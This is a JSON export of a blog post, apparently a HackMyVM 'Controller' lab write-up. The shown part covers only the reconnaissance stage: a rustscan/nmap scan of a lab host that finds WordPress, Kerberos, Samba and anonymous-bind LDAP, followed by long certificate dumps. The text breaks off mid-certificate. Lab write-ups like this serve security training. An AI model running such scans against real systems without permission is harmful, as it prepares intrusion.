{"id":795,"date":"2024-09-05T14:11:42","date_gmt":"2024-09-05T06:11:42","guid":{"rendered":"http:\/\/162.14.82.114\/?p=795"},"modified":"2024-09-05T14:11:42","modified_gmt":"2024-09-05T06:11:42","slug":"hmv-_-controller","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/795\/09\/05\/2024\/","title":{"rendered":"hmv[-_-]Controller"},"content":{"rendered":"<h1>Controller<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410540.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410540.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240903190058897\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410541.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410541.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905111120467\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Information gathering<\/h2>\n<h3>Port scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.10.101:22\nOpen 192.168.10.101:80\nOpen 192.168.10.101:88\nOpen 192.168.10.101:135\nOpen 192.168.10.101:139\nOpen 192.168.10.101:389\nOpen 192.168.10.101:443\nOpen 192.168.10.101:445\nOpen 192.168.10.101:464\nOpen 192.168.10.101:636\nOpen 192.168.10.101:3268\nOpen 192.168.10.101:3269\nOpen 192.168.10.101:49153\nOpen 192.168.10.101:49152\nOpen 192.168.10.101:49154\n\nPORT      STATE SERVICE      REASON  VERSION\n22\/tcp    open  ssh          syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 73:a1:2c:d9:47:5c:18:0b:68:60:02:58:f9:a2:c4:18 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC77ke\/V3ttGgim+K7soPIqpp2a+EYuyBXu2w0RqblsrXOSnnM3+10dHaajGskajqcn4UjK5E2ZcST+Pz9lN5pMk3QTtIf4XVEqPLPH6Cz2W0bZ5D5rgOItqqN4uIsAdb5tPJDqF1gbl\/7jv++6GrCSEqbNEzAuD0gGs+tIxa4\/rjz0XTaQdrxaERyn2GwHBGcxgw2v4Y4G9DaXoc42O1d\/AI0v40KVl8mvF+v3wpCHuznu7yyhuC4rj+EdCKCMM194Db9bHZAZtvqPInAEJOsiRBpNuhHTjGj6TeHjPCeQ83QQJ5KnQN\/Ezsh9CeH+ZWlLUd0kSkXL3nf+P\/Cb70NO3bq85jhOHcpVLC8R6P+HjWQLsYQ9bCVJO1vG1h1uYwHmZJjNQ8j8TE1\/8E7+eOBe0Ho9\/906VupHfWR\/Mrx6o4T7xzgWFYVglabR1zKqbsXt47MCpZSpDSbW0yFOikNN6Wj1vB+xTwyzUeM0uJE1Y\/LlLhfOlThrWGOlI2xHzwE=\n|   256 2d:51:0e:a5:af:b2:b1:36:5b:93:6c:d2:17:a3:39:4c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAdUtppvvCyWTDAfhnHVAli0c4AyepKxdOFTh6x6oO1uVwCb2s4d0rdgMGNORaBhIf7LPwR5BAKLeSiRAyIWWCY=\n|   256 d0:bb:81:c4:16:aa:28:af:68:f5:38:7d:af:9f:4a:5b (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAID1QLoQ1uk2sPbhqpdeYW1rv7HKlers4sS+7TbXNlZ6h\n80\/tcp    open  http         syn-ack Apache httpd 2.4.41 ((Ubuntu))\n|_http-title: CONTROLLER &amp;#8211; Otro sitio realizado con WordPress\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n|_http-generator: WordPress 5.7.2\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n88\/tcp    open  kerberos-sec syn-ack Heimdal Kerberos (server time: 2024-09-05 03:11:57Z)\n135\/tcp   open  msrpc        syn-ack Microsoft Windows 
RPC\n139\/tcp   open  netbios-ssn  syn-ack Samba smbd 4.6.2\n389\/tcp   open  ldap         syn-ack (Anonymous bind OK)\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated HOST certificate\n| Issuer: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated CA certificate\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-06-27T17:19:10\n| Not valid after:  2023-05-28T17:19:10\n| MD5:   2f18:e07a:ba20:8bf3:74c9:9c79:386b:53eb\n| SHA-1: b79a:aab3:dd81:3d7b:f578:a0dc:e737:cdb1:09ec:f011\n| -----BEGIN CERTIFICATE-----\n| MIIFwTCCA6mgAwIBAgIEDrPYYDANBgkqhkiG9w0BAQsFADB+MR0wGwYDVQQKExRT\n| YW1iYSBBZG1pbmlzdHJhdGlvbjE3MDUGA1UECxMuU2FtYmEgLSB0ZW1wb3Jhcnkg\n| YXV0b2dlbmVyYXRlZCBDQSBjZXJ0aWZpY2F0ZTEkMCIGA1UEAxMbQ09OVFJPTExF\n| Ui5jb250cm9sbGVyLmxvY2FsMB4XDTIxMDYyNzE3MTkxMFoXDTIzMDUyODE3MTkx\n| MFowgYAxHTAbBgNVBAoTFFNhbWJhIEFkbWluaXN0cmF0aW9uMTkwNwYDVQQLEzBT\n| YW1iYSAtIHRlbXBvcmFyeSBhdXRvZ2VuZXJhdGVkIEhPU1QgY2VydGlmaWNhdGUx\n| JDAiBgNVBAMTG0NPTlRST0xMRVIuY29udHJvbGxlci5sb2NhbDCCAiIwDQYJKoZI\n| hvcNAQEBBQADggIPADCCAgoCggIBANX2nII0mTXyotfhizuRWOiX38+tol1Zld\/D\n| \/8srPjJnMm6sfDjyU+7bnPFKFbxxYYXQtJxq7cgO9TgWzoA1Lw3TPLG3Z9gKv6gq\n| l2jftA\/VRHXhoe7GONG+3DSYyNuqo0+eEngPx1CqwyhR\/N2MZerV3wgoOnLcRL5R\n| ALFYOHxaqXoJZrmxx\/pMQQ5w+PSQk9rAHvLcZb3BJs+PSK8Y2AyI+RAmpV9RrJuY\n| LaEothKj71zdIC+duNUD7C\/PCU5tgVm0PwtktEBZ99SiyRnokrv9k8x\/v\/Pj66Cy\n| KaVnRfj86GamIssJ0\/8Rc2EX20\/eyyvx42VI1HeVNoIdqsufItOyxDCs8hdng4sg\n| W75FZ\/\/FwHSsuqh2O5TboQMomnFdXO7dsBUZKvcN5Pzoco0xV0nvtPmsj\/WLUcUx\n| QrdtrCHSnuyX4+d0IG0qpQdi5\/ie72by13fCeg8RyLE\/Kc4CWsZmpC0e8sG2xKKe\n| KSoCJYdZVAE33UTdfbenLKfq\/E8y8EAjPiOV01s8Y9INqn0xWH6AKj\/HLSIKPMkm\n| nrgjhQ5sE9hLABziqRv1Du9NsWVNdrv92X4LrGCPjlIP0hXjLY7JC6IpLWERQ7Yk\n| 
UWKppFRFDA30sb5hxZYl4vpaGLB+cB2PXAeLKW50sHS8bJDnUsDl8HEuvtEpqFQc\n| efZI2G6tAgMBAAGjRDBCMAwGA1UdEwEB\/wQCMAAwEwYDVR0lBAwwCgYIKwYBBQUH\n| AwEwHQYDVR0OBBYEFPvUu+RAukl7VCb8qdF5cUv9BmC1MA0GCSqGSIb3DQEBCwUA\n| A4ICAQA7opKmMCaWkfJfmnCZBCJcWRTTdVnXseFxSchMMPjtOqPp8Zgk4Kf+JZbM\n| +0FSpg2\/UHu6W5OWVeefD\/stBdacwRN4nR2ipadnCyg8Tmo6dqJUaAx0pIwjWxAX\n| oj5OVXTrjh3u2rW4J\/gbh1d5S3\/m1p6x0q3ZCKD7NIlPfspuMFTstC+oC3A+PAkd\n| NkPJWjcgUcUrV7R5F9OKEWA+IuQRUKMvqT6KbKs\/KhNaTFXfNbYhegVlWNtK5xq\/\n| 9dbnv+EWVWWBGELztqukGkAmDSEV6JIdT69rkjxagHXp9lxaxuFehhKftvCilAQl\n| D3EGuONkooGqyJyTXa+fuM1lRdWFI1o+GSNzDnBEJF0RrErcmS1MOVk13uOmPXLD\n| md9CT5pKEkZuHG7XUt6di8PaJgd6Zhd2IJC8ZCUbGEfeaDDYNNAuu+EqMQlckMfO\n| OcyWwmMN1oTS27\/aSlVdi4EpQWGHx4GlwcfLFoZRUiFzLLHYVu0EZzQ+NefWa16a\n| 7Oq0hYp\/D8vU8lWqgrFo8nToejP5ejwP8poO7+nTmrWCnbjDfB86DF9dvgvA0W8V\n| iUkEQicyX+XBq\/pM1Q4z3bPZQyJ8ZSxJy+yt9WgD6k6yNGNzmPR5iNlqNh4h7NmZ\n| khp99Hd2Ztlmgfy73EvaVMiNZFZeHwPGD6F8BG82jwNhhi73Vg==\n|_-----END CERTIFICATE-----\n443\/tcp   open  ssl\/http     syn-ack Apache httpd 2.4.41 ((Ubuntu))\n| ssl-cert: Subject: organizationName=CONTROLLER\/stateOrProvinceName=Some-State\/countryName=AU\/emailAddress=admin@controller.local\n| Issuer: organizationName=CONTROLLER\/stateOrProvinceName=Some-State\/countryName=AU\/emailAddress=admin@controller.local\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-06-27T17:44:27\n| Not valid after:  2022-06-27T17:44:27\n| MD5:   448b:e3c3:423d:02dc:2018:9af6:a2ea:f26b\n| SHA-1: ecb8:c338:f6ed:052b:f857:0b4d:30b1:3cf5:f2d0:1df5\n| -----BEGIN CERTIFICATE-----\n| MIIDnTCCAoWgAwIBAgIUbo2iGZrkCEn5swmerlQPfHiEfsIwDQYJKoZIhvcNAQEL\n| BQAwXjELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxEzARBgNVBAoM\n| CkNPTlRST0xMRVIxJTAjBgkqhkiG9w0BCQEWFmFkbWluQGNvbnRyb2xsZXIubG9j\n| YWwwHhcNMjEwNjI3MTc0NDI3WhcNMjIwNjI3MTc0NDI3WjBeMQswCQYDVQQGEwJB\n| VTETMBEGA1UECAwKU29tZS1TdGF0ZTETMBEGA1UECgwKQ09OVFJPTExFUjElMCMG\n| 
CSqGSIb3DQEJARYWYWRtaW5AY29udHJvbGxlci5sb2NhbDCCASIwDQYJKoZIhvcN\n| AQEBBQADggEPADCCAQoCggEBALnMYAE1YEge4idEyZz2QO2ZH7Fkw6WZBHYhSgom\n| YYxh9dOm7JGpQPs5ms\/p\/9R5mW4EFDsvj2AaJ4M66A8Jz7yFQfDm0FOXUSnDb8\/9\n| tvmtynya+lkaMbc\/kBRdVCrOYhZiwNhel9ULs8E3eGtAR31KNeIGq7KO+rfyYTbV\n| YNRAhqoTfuYuEkLMjqGqJXeqwyg5+U6xVuRphTu1mY8Q\/Aya2h2ZS\/G1SL0TqI5T\n| teP2kg5rIi3qATgYFOpAMEL9kT6t98srSa97Sgd3MPm9R\/xhGyGlzrM47C7HTY8b\n| v3o9NK5oP3WY2W\/6vAGOIqsD1rYqQGgX9WPFQ2XbFWM8CLsCAwEAAaNTMFEwHQYD\n| VR0OBBYEFA\/hxV8NXRkX59khwf7ugvYZRo4XMB8GA1UdIwQYMBaAFA\/hxV8NXRkX\n| 59khwf7ugvYZRo4XMA8GA1UdEwEB\/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEB\n| AA+XOmqmTiRBbcHM+i2HLp4t2p6xrAhlAmHo+YNzRY\/HLU+Km5Zp7yR96cv5HjM8\n| wfuszTW2MioCHo2hFZazdxo1V4LkIYr\/9RHLVUO3AoxIUyQJ960O7NYxdo2+14oG\n| jJYBXY2jGpuTqtl+rSMS\/9R1Ob7C1qF4W9hPuT3qw\/XTOla6N5t3zcpsKL2K4zUb\n| tili\/ng5ZQAVChRCncUA7pSrCIjZrEFnlA0+A5N7Q5hYy52xqvHdlwXWyvVp6P3F\n| vBzkYWtrZVGjE+y4aL51X5Wq2Jsh\/68lNV8ysY9pYqDgYberBglR0XDfk0Je3s3+\n| 2pa5oxComZ+a8+3YWFL2NG4=\n|_-----END CERTIFICATE-----\n|_http-generator: WordPress 5.7.2\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n|_http-title: CONTROLLER &amp;#8211; Otro sitio realizado con WordPress\n| tls-alpn: \n|_  http\/1.1\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_ssl-date: TLS randomness does not represent time\n445\/tcp   open  netbios-ssn  syn-ack Samba smbd 4.6.2\n464\/tcp   open  kpasswd5?    
syn-ack\n636\/tcp   open  ssl\/ldap     syn-ack (Anonymous bind OK)\n| ssl-cert: Subject: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated HOST certificate\n| Issuer: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated CA certificate\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-06-27T17:19:10\n| Not valid after:  2023-05-28T17:19:10\n| MD5:   2f18:e07a:ba20:8bf3:74c9:9c79:386b:53eb\n| SHA-1: b79a:aab3:dd81:3d7b:f578:a0dc:e737:cdb1:09ec:f011\n| -----BEGIN CERTIFICATE-----\n| MIIFwTCCA6mgAwIBAgIEDrPYYDANBgkqhkiG9w0BAQsFADB+MR0wGwYDVQQKExRT\n| YW1iYSBBZG1pbmlzdHJhdGlvbjE3MDUGA1UECxMuU2FtYmEgLSB0ZW1wb3Jhcnkg\n| YXV0b2dlbmVyYXRlZCBDQSBjZXJ0aWZpY2F0ZTEkMCIGA1UEAxMbQ09OVFJPTExF\n| Ui5jb250cm9sbGVyLmxvY2FsMB4XDTIxMDYyNzE3MTkxMFoXDTIzMDUyODE3MTkx\n| MFowgYAxHTAbBgNVBAoTFFNhbWJhIEFkbWluaXN0cmF0aW9uMTkwNwYDVQQLEzBT\n| YW1iYSAtIHRlbXBvcmFyeSBhdXRvZ2VuZXJhdGVkIEhPU1QgY2VydGlmaWNhdGUx\n| JDAiBgNVBAMTG0NPTlRST0xMRVIuY29udHJvbGxlci5sb2NhbDCCAiIwDQYJKoZI\n| hvcNAQEBBQADggIPADCCAgoCggIBANX2nII0mTXyotfhizuRWOiX38+tol1Zld\/D\n| \/8srPjJnMm6sfDjyU+7bnPFKFbxxYYXQtJxq7cgO9TgWzoA1Lw3TPLG3Z9gKv6gq\n| l2jftA\/VRHXhoe7GONG+3DSYyNuqo0+eEngPx1CqwyhR\/N2MZerV3wgoOnLcRL5R\n| ALFYOHxaqXoJZrmxx\/pMQQ5w+PSQk9rAHvLcZb3BJs+PSK8Y2AyI+RAmpV9RrJuY\n| LaEothKj71zdIC+duNUD7C\/PCU5tgVm0PwtktEBZ99SiyRnokrv9k8x\/v\/Pj66Cy\n| KaVnRfj86GamIssJ0\/8Rc2EX20\/eyyvx42VI1HeVNoIdqsufItOyxDCs8hdng4sg\n| W75FZ\/\/FwHSsuqh2O5TboQMomnFdXO7dsBUZKvcN5Pzoco0xV0nvtPmsj\/WLUcUx\n| QrdtrCHSnuyX4+d0IG0qpQdi5\/ie72by13fCeg8RyLE\/Kc4CWsZmpC0e8sG2xKKe\n| KSoCJYdZVAE33UTdfbenLKfq\/E8y8EAjPiOV01s8Y9INqn0xWH6AKj\/HLSIKPMkm\n| nrgjhQ5sE9hLABziqRv1Du9NsWVNdrv92X4LrGCPjlIP0hXjLY7JC6IpLWERQ7Yk\n| UWKppFRFDA30sb5hxZYl4vpaGLB+cB2PXAeLKW50sHS8bJDnUsDl8HEuvtEpqFQc\n| 
efZI2G6tAgMBAAGjRDBCMAwGA1UdEwEB\/wQCMAAwEwYDVR0lBAwwCgYIKwYBBQUH\n| AwEwHQYDVR0OBBYEFPvUu+RAukl7VCb8qdF5cUv9BmC1MA0GCSqGSIb3DQEBCwUA\n| A4ICAQA7opKmMCaWkfJfmnCZBCJcWRTTdVnXseFxSchMMPjtOqPp8Zgk4Kf+JZbM\n| +0FSpg2\/UHu6W5OWVeefD\/stBdacwRN4nR2ipadnCyg8Tmo6dqJUaAx0pIwjWxAX\n| oj5OVXTrjh3u2rW4J\/gbh1d5S3\/m1p6x0q3ZCKD7NIlPfspuMFTstC+oC3A+PAkd\n| NkPJWjcgUcUrV7R5F9OKEWA+IuQRUKMvqT6KbKs\/KhNaTFXfNbYhegVlWNtK5xq\/\n| 9dbnv+EWVWWBGELztqukGkAmDSEV6JIdT69rkjxagHXp9lxaxuFehhKftvCilAQl\n| D3EGuONkooGqyJyTXa+fuM1lRdWFI1o+GSNzDnBEJF0RrErcmS1MOVk13uOmPXLD\n| md9CT5pKEkZuHG7XUt6di8PaJgd6Zhd2IJC8ZCUbGEfeaDDYNNAuu+EqMQlckMfO\n| OcyWwmMN1oTS27\/aSlVdi4EpQWGHx4GlwcfLFoZRUiFzLLHYVu0EZzQ+NefWa16a\n| 7Oq0hYp\/D8vU8lWqgrFo8nToejP5ejwP8poO7+nTmrWCnbjDfB86DF9dvgvA0W8V\n| iUkEQicyX+XBq\/pM1Q4z3bPZQyJ8ZSxJy+yt9WgD6k6yNGNzmPR5iNlqNh4h7NmZ\n| khp99Hd2Ztlmgfy73EvaVMiNZFZeHwPGD6F8BG82jwNhhi73Vg==\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n3268\/tcp  open  ldap         syn-ack (Anonymous bind OK)\n| ssl-cert: Subject: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated HOST certificate\n| Issuer: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated CA certificate\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-06-27T17:19:10\n| Not valid after:  2023-05-28T17:19:10\n| MD5:   2f18:e07a:ba20:8bf3:74c9:9c79:386b:53eb\n| SHA-1: b79a:aab3:dd81:3d7b:f578:a0dc:e737:cdb1:09ec:f011\n| -----BEGIN CERTIFICATE-----\n| MIIFwTCCA6mgAwIBAgIEDrPYYDANBgkqhkiG9w0BAQsFADB+MR0wGwYDVQQKExRT\n| YW1iYSBBZG1pbmlzdHJhdGlvbjE3MDUGA1UECxMuU2FtYmEgLSB0ZW1wb3Jhcnkg\n| YXV0b2dlbmVyYXRlZCBDQSBjZXJ0aWZpY2F0ZTEkMCIGA1UEAxMbQ09OVFJPTExF\n| Ui5jb250cm9sbGVyLmxvY2FsMB4XDTIxMDYyNzE3MTkxMFoXDTIzMDUyODE3MTkx\n| 
MFowgYAxHTAbBgNVBAoTFFNhbWJhIEFkbWluaXN0cmF0aW9uMTkwNwYDVQQLEzBT\n| YW1iYSAtIHRlbXBvcmFyeSBhdXRvZ2VuZXJhdGVkIEhPU1QgY2VydGlmaWNhdGUx\n| JDAiBgNVBAMTG0NPTlRST0xMRVIuY29udHJvbGxlci5sb2NhbDCCAiIwDQYJKoZI\n| hvcNAQEBBQADggIPADCCAgoCggIBANX2nII0mTXyotfhizuRWOiX38+tol1Zld\/D\n| \/8srPjJnMm6sfDjyU+7bnPFKFbxxYYXQtJxq7cgO9TgWzoA1Lw3TPLG3Z9gKv6gq\n| l2jftA\/VRHXhoe7GONG+3DSYyNuqo0+eEngPx1CqwyhR\/N2MZerV3wgoOnLcRL5R\n| ALFYOHxaqXoJZrmxx\/pMQQ5w+PSQk9rAHvLcZb3BJs+PSK8Y2AyI+RAmpV9RrJuY\n| LaEothKj71zdIC+duNUD7C\/PCU5tgVm0PwtktEBZ99SiyRnokrv9k8x\/v\/Pj66Cy\n| KaVnRfj86GamIssJ0\/8Rc2EX20\/eyyvx42VI1HeVNoIdqsufItOyxDCs8hdng4sg\n| W75FZ\/\/FwHSsuqh2O5TboQMomnFdXO7dsBUZKvcN5Pzoco0xV0nvtPmsj\/WLUcUx\n| QrdtrCHSnuyX4+d0IG0qpQdi5\/ie72by13fCeg8RyLE\/Kc4CWsZmpC0e8sG2xKKe\n| KSoCJYdZVAE33UTdfbenLKfq\/E8y8EAjPiOV01s8Y9INqn0xWH6AKj\/HLSIKPMkm\n| nrgjhQ5sE9hLABziqRv1Du9NsWVNdrv92X4LrGCPjlIP0hXjLY7JC6IpLWERQ7Yk\n| UWKppFRFDA30sb5hxZYl4vpaGLB+cB2PXAeLKW50sHS8bJDnUsDl8HEuvtEpqFQc\n| efZI2G6tAgMBAAGjRDBCMAwGA1UdEwEB\/wQCMAAwEwYDVR0lBAwwCgYIKwYBBQUH\n| AwEwHQYDVR0OBBYEFPvUu+RAukl7VCb8qdF5cUv9BmC1MA0GCSqGSIb3DQEBCwUA\n| A4ICAQA7opKmMCaWkfJfmnCZBCJcWRTTdVnXseFxSchMMPjtOqPp8Zgk4Kf+JZbM\n| +0FSpg2\/UHu6W5OWVeefD\/stBdacwRN4nR2ipadnCyg8Tmo6dqJUaAx0pIwjWxAX\n| oj5OVXTrjh3u2rW4J\/gbh1d5S3\/m1p6x0q3ZCKD7NIlPfspuMFTstC+oC3A+PAkd\n| NkPJWjcgUcUrV7R5F9OKEWA+IuQRUKMvqT6KbKs\/KhNaTFXfNbYhegVlWNtK5xq\/\n| 9dbnv+EWVWWBGELztqukGkAmDSEV6JIdT69rkjxagHXp9lxaxuFehhKftvCilAQl\n| D3EGuONkooGqyJyTXa+fuM1lRdWFI1o+GSNzDnBEJF0RrErcmS1MOVk13uOmPXLD\n| md9CT5pKEkZuHG7XUt6di8PaJgd6Zhd2IJC8ZCUbGEfeaDDYNNAuu+EqMQlckMfO\n| OcyWwmMN1oTS27\/aSlVdi4EpQWGHx4GlwcfLFoZRUiFzLLHYVu0EZzQ+NefWa16a\n| 7Oq0hYp\/D8vU8lWqgrFo8nToejP5ejwP8poO7+nTmrWCnbjDfB86DF9dvgvA0W8V\n| iUkEQicyX+XBq\/pM1Q4z3bPZQyJ8ZSxJy+yt9WgD6k6yNGNzmPR5iNlqNh4h7NmZ\n| khp99Hd2Ztlmgfy73EvaVMiNZFZeHwPGD6F8BG82jwNhhi73Vg==\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n3269\/tcp  open  ssl\/ldap     syn-ack (Anonymous bind OK)\n| 
ssl-cert: Subject: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated HOST certificate\n| Issuer: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated CA certificate\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-06-27T17:19:10\n| Not valid after:  2023-05-28T17:19:10\n| MD5:   2f18:e07a:ba20:8bf3:74c9:9c79:386b:53eb\n| SHA-1: b79a:aab3:dd81:3d7b:f578:a0dc:e737:cdb1:09ec:f011\n| -----BEGIN CERTIFICATE-----\n| MIIFwTCCA6mgAwIBAgIEDrPYYDANBgkqhkiG9w0BAQsFADB+MR0wGwYDVQQKExRT\n| YW1iYSBBZG1pbmlzdHJhdGlvbjE3MDUGA1UECxMuU2FtYmEgLSB0ZW1wb3Jhcnkg\n| YXV0b2dlbmVyYXRlZCBDQSBjZXJ0aWZpY2F0ZTEkMCIGA1UEAxMbQ09OVFJPTExF\n| Ui5jb250cm9sbGVyLmxvY2FsMB4XDTIxMDYyNzE3MTkxMFoXDTIzMDUyODE3MTkx\n| MFowgYAxHTAbBgNVBAoTFFNhbWJhIEFkbWluaXN0cmF0aW9uMTkwNwYDVQQLEzBT\n| YW1iYSAtIHRlbXBvcmFyeSBhdXRvZ2VuZXJhdGVkIEhPU1QgY2VydGlmaWNhdGUx\n| JDAiBgNVBAMTG0NPTlRST0xMRVIuY29udHJvbGxlci5sb2NhbDCCAiIwDQYJKoZI\n| hvcNAQEBBQADggIPADCCAgoCggIBANX2nII0mTXyotfhizuRWOiX38+tol1Zld\/D\n| \/8srPjJnMm6sfDjyU+7bnPFKFbxxYYXQtJxq7cgO9TgWzoA1Lw3TPLG3Z9gKv6gq\n| l2jftA\/VRHXhoe7GONG+3DSYyNuqo0+eEngPx1CqwyhR\/N2MZerV3wgoOnLcRL5R\n| ALFYOHxaqXoJZrmxx\/pMQQ5w+PSQk9rAHvLcZb3BJs+PSK8Y2AyI+RAmpV9RrJuY\n| LaEothKj71zdIC+duNUD7C\/PCU5tgVm0PwtktEBZ99SiyRnokrv9k8x\/v\/Pj66Cy\n| KaVnRfj86GamIssJ0\/8Rc2EX20\/eyyvx42VI1HeVNoIdqsufItOyxDCs8hdng4sg\n| W75FZ\/\/FwHSsuqh2O5TboQMomnFdXO7dsBUZKvcN5Pzoco0xV0nvtPmsj\/WLUcUx\n| QrdtrCHSnuyX4+d0IG0qpQdi5\/ie72by13fCeg8RyLE\/Kc4CWsZmpC0e8sG2xKKe\n| KSoCJYdZVAE33UTdfbenLKfq\/E8y8EAjPiOV01s8Y9INqn0xWH6AKj\/HLSIKPMkm\n| nrgjhQ5sE9hLABziqRv1Du9NsWVNdrv92X4LrGCPjlIP0hXjLY7JC6IpLWERQ7Yk\n| UWKppFRFDA30sb5hxZYl4vpaGLB+cB2PXAeLKW50sHS8bJDnUsDl8HEuvtEpqFQc\n| efZI2G6tAgMBAAGjRDBCMAwGA1UdEwEB\/wQCMAAwEwYDVR0lBAwwCgYIKwYBBQUH\n| 
AwEwHQYDVR0OBBYEFPvUu+RAukl7VCb8qdF5cUv9BmC1MA0GCSqGSIb3DQEBCwUA\n| A4ICAQA7opKmMCaWkfJfmnCZBCJcWRTTdVnXseFxSchMMPjtOqPp8Zgk4Kf+JZbM\n| +0FSpg2\/UHu6W5OWVeefD\/stBdacwRN4nR2ipadnCyg8Tmo6dqJUaAx0pIwjWxAX\n| oj5OVXTrjh3u2rW4J\/gbh1d5S3\/m1p6x0q3ZCKD7NIlPfspuMFTstC+oC3A+PAkd\n| NkPJWjcgUcUrV7R5F9OKEWA+IuQRUKMvqT6KbKs\/KhNaTFXfNbYhegVlWNtK5xq\/\n| 9dbnv+EWVWWBGELztqukGkAmDSEV6JIdT69rkjxagHXp9lxaxuFehhKftvCilAQl\n| D3EGuONkooGqyJyTXa+fuM1lRdWFI1o+GSNzDnBEJF0RrErcmS1MOVk13uOmPXLD\n| md9CT5pKEkZuHG7XUt6di8PaJgd6Zhd2IJC8ZCUbGEfeaDDYNNAuu+EqMQlckMfO\n| OcyWwmMN1oTS27\/aSlVdi4EpQWGHx4GlwcfLFoZRUiFzLLHYVu0EZzQ+NefWa16a\n| 7Oq0hYp\/D8vU8lWqgrFo8nToejP5ejwP8poO7+nTmrWCnbjDfB86DF9dvgvA0W8V\n| iUkEQicyX+XBq\/pM1Q4z3bPZQyJ8ZSxJy+yt9WgD6k6yNGNzmPR5iNlqNh4h7NmZ\n| 